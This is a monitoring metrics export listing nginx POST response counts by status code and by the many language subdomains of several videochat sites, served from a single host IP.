nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mi.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mk.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mk.videochat.date"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mk.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mk.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mk.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mk.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ml.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ml.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ml.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ml.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ml.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mn.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mn.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mn.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mn.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mn.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mr.videochat.cafe"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mr.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mr.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mr.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mr.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mr.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mrj.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mrj.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mrj.videochat.mx"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mrj.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mrj.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mrj.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ms.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ms.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ms.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ms.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ms.videochat.world"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mt.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mt.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mt.videochat.mx"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mt.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mt.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mt.videochat.world"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="my.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="my.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="my.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="my.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="my.videochat.world"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ne.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ne.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ne.videochat.mx"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ne.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ne.videochat.world"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="nl.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="nl.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="nl.videochat.mx"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="nl.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="nl.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="no.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="no.videochat.date"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="no.videochat.mx"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="no.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="no.videochat.world"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pa.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pa.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pa.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pa.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pa.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pap.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pap.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pap.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pap.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pap.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pl.videochat.cafe"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pl.videochat.date"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pl.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pl.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pl.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pl.videochat.world"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pt.videochat.cafe"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pt.videochat.date"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pt.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pt.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pt.videochat.world"} 1579 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ro.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ro.videochat.date"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ro.videochat.mx"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ro.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ro.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ro.videochat.world"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sco.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sco.videochat.mx"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sco.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sco.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="si.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="si.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="si.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="si.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="si.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sk.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sk.videochat.date"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sk.videochat.mx"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sk.videochat.tv.br"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sk.videochat.world"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sl.videochat.cafe"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sl.videochat.date"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sl.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sl.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sl.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sl.videochat.world"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sr.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sr.videochat.date"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sr.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sr.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sr.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sr.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="su.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="su.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="su.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="su.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="su.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sv.videochat.cafe"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sv.videochat.date"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sv.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sv.videochat.show"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sv.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sv.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sw.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sw.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sw.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sw.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sw.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ta.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ta.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ta.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ta.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ta.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="te.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="te.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="te.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="te.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="te.videochat.world"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tg.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tg.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tg.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tg.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tg.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tg.videochat.world"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="th.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="th.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="th.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="th.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="th.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="th.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tl.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tl.videochat.date"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tl.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tl.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tl.videochat.tv.br"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tl.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tr.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tr.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tr.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tr.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tr.videochat.tv.br"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tr.videochat.world"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tt.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tt.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tt.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tt.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tt.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tt.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="udm.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="udm.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="udm.videochat.mx"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="udm.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="udm.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="udm.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uk.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uk.videochat.date"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uk.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uk.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uk.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ur.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ur.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ur.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ur.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ur.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uz.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uz.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uz.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uz.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="uz.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="vi.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="vi.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="vi.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="vi.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="vi.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="videochat.cafe"} 180 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="videochat.date"} 172 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="videochat.mx"} 174 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="videochat.show"} 138 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="videochat.tv.br"} 2398 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="videochat.world"} 226 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="xh.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="xh.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="xh.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="xh.videochat.tv.br"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="xh.videochat.world"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="yi.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="yi.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="yi.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="yi.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="yi.videochat.tv.br"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="yi.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="zh.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="zh.videochat.date"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="zh.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="zh.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="zh.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="zh.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="%!s(MISSING)"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="127.0.0.1:80"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="14fc525b-13a8-40c3-8f05-01cd06b04453.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="161.97.120.25"} 348 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="161.97.120.25:80"} 592 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="43822297-98c3-4c96-b5b8-6a4c4675d440.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="8115dadb-0b6b-4cca-ac37-a5cf02c05ca9.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="8f76d726-154f-4e15-83cf-3f4903a60b07.videochat.mx"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="af.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="af.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="af.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="af.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="af.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="af.videochat.world"} 224 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="al.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="al.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="al.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="al.videochat.world"} 241 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="am.videochat.cafe"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="am.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="am.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="am.videochat.world"} 110 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="app.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ar.videochat.cafe"} 195 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ar.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ar.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ar.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ar.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ar.videochat.world"} 642 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="az.videochat.cafe"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="az.videochat.mx"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="az.videochat.tv.br"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="az.videochat.world"} 117 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ba.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ba.videochat.date"} 82 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ba.videochat.mx"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ba.videochat.show"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ba.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ba.videochat.world"} 93 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="be.videochat.cafe"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="be.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="be.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="be.videochat.tv.br"} 310 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="be.videochat.world"} 286 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bg.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bg.videochat.date"} 137 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bg.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bg.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bg.videochat.world"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bn.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bn.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bn.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bn.videochat.tv.br"} 86 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bn.videochat.world"} 127 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bs.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bs.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bs.videochat.show"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bs.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bs.videochat.world"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="bwfzopl.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ca.videochat.cafe"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ca.videochat.mx"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ca.videochat.tv.br"} 24 